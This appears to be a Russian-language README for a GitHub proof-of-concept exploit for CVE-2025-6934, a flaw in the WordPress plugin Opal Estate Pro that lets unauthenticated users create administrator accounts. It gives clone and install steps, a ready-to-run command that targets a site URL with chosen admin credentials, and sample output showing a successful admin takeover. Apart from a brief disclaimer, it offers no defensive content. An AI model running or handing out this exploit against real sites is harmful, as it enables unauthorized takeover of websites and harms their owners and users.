
CVE-2025-6934 — это критическая уязвимость в плагине WordPress Opal Estate Pro (<= 1.7.5), которая позволяет неаутентифицированным злоумышленникам создавать новые учётные записи администратора через небезопасный процесс AJAX-регистрации плагина.
📖 Описание Этот репозиторий содержит PoC-эксплойт (Proof of Concept) для CVE-2025-6934 — критической уязвимости в WordPress Plugin: Opal Estate Pro <= 1.7.5, позволяющей неавторизованное создание учётной записи администратора.
⚠️ Отказ от ответственности: Этот инструмент предоставляется только для образовательных целей и исследований в области безопасности. Автор не несёт ответственности за любое неправомерное использование или причинённый ущерб.
readme.txtКлонируйте репозиторий и установите зависимости:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Запустите скрипт с вашей целью:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Пример вывода:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
Этот проект лицензирован под лицензией MIT — подробнее см. в файле LICENSE.